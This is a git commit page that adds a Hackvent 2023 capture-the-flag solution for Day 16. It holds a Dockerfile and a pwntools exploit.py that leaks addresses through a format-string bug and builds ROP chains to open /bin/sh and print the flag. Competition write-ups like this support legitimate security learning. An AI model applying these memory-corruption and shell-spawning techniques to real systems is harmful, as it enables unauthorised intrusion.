Home Explore Help
Register Sign In
Roman
/
Hackvent_2023
1
0
Fork 0
Files
Browse Source

Day 16

Roman Hergenreder 4 months ago
parent
14a2b0f4ad
commit
2bf71ada77
5 changed files with 158 additions and 0 deletions
Split View Show Diff Stats
  1. 11 0
      Day 16/Dockerfile
  2. 147 0
      Day 16/exploit.py
  3. BIN
      Day 16/libc6_2.37-0ubuntu2.2_amd64.so
  4. BIN
      Day 16/santas-gift-factory.zip
  5. BIN
      Day 16/vuln

+ 11 - 0
Day 16/Dockerfile
View File 

@@ -0,0 +1,11 @@
 
+FROM ubuntu:23.04
 
+
 
+RUN apt update && apt -y upgrade
 
+RUN apt install -y socat
 
+
 
+COPY . .
 
+
 
+RUN chmod +x vuln
 
+RUN chmod +x magic.sh
 
+
 
+ENTRYPOINT socat TCP-LISTEN:1337,reuseaddr,fork EXEC:'./vuln',raw

+ 147 - 0
Day 16/exploit.py
View File 

@@ -0,0 +1,147 @@
 
+#!/usr/bin/env python3
 
+# -*- coding: utf-8 -*-
 
+# This exploit template was generated via:
 
+# $ pwn template '--host=152.96.15.8' '--port=1337'
 
+from pwn import *
 
+from hackingscripts import util
 
+import struct
 
+
 
+exe = context.binary = ELF(args.EXE or './vuln')
 
+libc = ELF("./libc6_2.37-0ubuntu2.2_amd64.so", checksec=False)
 
+
 
+# Many built-in settings can be controlled on the command-line and show up
 
+# in "args".  For example, to dump all data sent/received, and disable ASLR
 
+# for all created processes...
 
+# ./exploit.py DEBUG NOASLR
 
+# ./exploit.py GDB HOST=example.com PORT=4141 EXE=/tmp/executable
 
+host = args.HOST or 'b8fb5148-65c8-4306-9341-e2ba20821791.rdocker.vuln.land'
 
+port = int(args.PORT or 1337)
 
+
 
+def start_local(argv=[], *a, **kw):
 
+    '''Execute the target binary locally'''
 
+    if args.GDB:
 
+        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
 
+    else:
 
+        return process([exe.path] + argv, *a, **kw)
 
+
 
+def start_remote(argv=[], *a, **kw):
 
+    '''Connect to the process on the remote host'''
 
+    io = connect(host, port)
 
+    if args.GDB:
 
+        gdb.attach(io, gdbscript=gdbscript)
 
+    return io
 
+
 
+def start(argv=[], *a, **kw):
 
+    '''Start the exploit against the target.'''
 
+    if args.LOCAL:
 
+        return start_local(argv, *a, **kw)
 
+    else:
 
+        return start_remote(argv, *a, **kw)
 
+
 
+# Specify your GDB script here for debugging
 
+# GDB will be launched if the exploit is run via e.g.
 
+# ./exploit.py GDB
 
+gdbscript = '''
 
+continue
 
+'''.format(**locals())
 
+
 
+#===========================================================
 
+#                    EXPLOIT GOES HERE
 
+#===========================================================
 
+
 
+def tell_flag(username, fmt):
 
+
 
+    if not isinstance(username, bytes):
 
+        username = username.encode()
 
+
 
+    if not isinstance(fmt, bytes):
 
+        fmt = fmt.encode()
 
+
 
+    io.recvuntil(b"> ")
 
+    io.sendline(username)
 
+    io.recvuntil(b"> ")
 
+   
+    io.sendline(fmt)
 
+    result = io.recvuntil(b"I will see what I can do...\n")
 
+
 
+    prefix = b"\x1b[?25h\nSanta: You want me to help you with "
 
+    if result.startswith(prefix):
 
+        result = result[len(prefix):]
 
+
 
+    suffix = b"?\nSanta: I will see what I can do...\n"
 
+    if result.endswith(suffix):
 
+        result = result[:-len(suffix)]
 
+
 
+    return result
 
+
 
+def do_conn(username, fmt):
 
+
 
+    io.recvuntil(b"(y/n)? ")
 
+    io.sendline(b"y")
 
+
 
+    data = io.recvuntil(b"> ")
 
+    lines = data.decode().split("\n")
 
+    present_count = {"red": 0, "blue": 0, "yellow": 0}
 
+    for line in lines:
 
+        match = re.match(r"\s*-\s*(red|yellow|blue)", line.strip())
 
+        if match:
 
+            color = match[1]
 
+            present_count[color] = present_count[color] + 1
 
+
 
+    io.sendline(str(present_count["red"]).encode())
 
+    io.recvuntil(b"> ")
 
+    io.sendline(str(present_count["yellow"]).encode())
 
+    io.recvuntil(b"> ")
 
+    io.sendline(str(present_count["blue"]).encode())
 
+    return tell_flag(username, fmt)
 
+
 
+io = start()
 
+payload = b""
 
+payload += b"%35$p|%39$p|"
 
+payload += (168 - len(payload)) * b"A"
 
+assert len(payload) == 168
 
+payload += p8(0xA0)
 
+
 
+result = do_conn("x", payload)
 
+leak = result.split(b'|')
 
+
 
+exe.address = int(leak[0][2:],16) - exe.symbols["main"] - 158
 
+log.info(f"Piebase: {hex(exe.address)}")
 
+
 
+libc_leak = int(leak[1][2:],16)+48
 
+libc.address = libc_leak - libc.symbols["__libc_start_main"]
 
+log.info(f"libc leak: {hex(libc_leak)} ")
 
+log.info(f"libc base: {hex(libc.address)}")
 
+
 
+# chain for shell
 
+rop = ROP([libc, exe])
 
+rop.raw(rop.find_gadget(['ret'])) # stack align
 
+rop.system(next(libc.search(b"/bin/sh")))
 
+rop.raw(rop.find_gadget(['ret'])) # stack align
 
+rop.call(exe.symbols["tellflag"])
 
+payload = b"A"*168 + rop.chain()
 
+tell_flag("x", payload)
 
+
 
+io.sendline(b"ps | grep vuln | awk '{print $1}'")
 
+pid = io.recvline().strip().decode()
 
+print("[+] Got PID:", pid)
 
+
 
+io.sendline(f"cat /proc/{pid}/maps | grep heap | awk -F '-' '{{print $1}}'".encode())
 
+heap_base = int(io.recvline().decode(), 16)
 
+print("[+] Got Heap base:", hex(heap_base))
 
+io.sendline(b"exit")
 
+
 
+rop = ROP([libc])
 
+rop.raw(rop.find_gadget(['ret'])) # stack align
 
+rop.puts(heap_base + 0x484, )
 
+rop.call(exe.symbols["main"])
 
+
 
+payload = b""
 
+payload += 160 * b"A"
 
+payload += p64(0)
 
+payload += rop.chain()
 
+tell_flag("x", payload)
 
+flag = "HV23" + io.recvline().decode().strip()
 
+print("[+] Flag:", flag)
 
+io.close()
 
+

BIN
Day 16/libc6_2.37-0ubuntu2.2_amd64.so
View File


BIN
Day 16/santas-gift-factory.zip
View File


BIN
Day 16/vuln
View File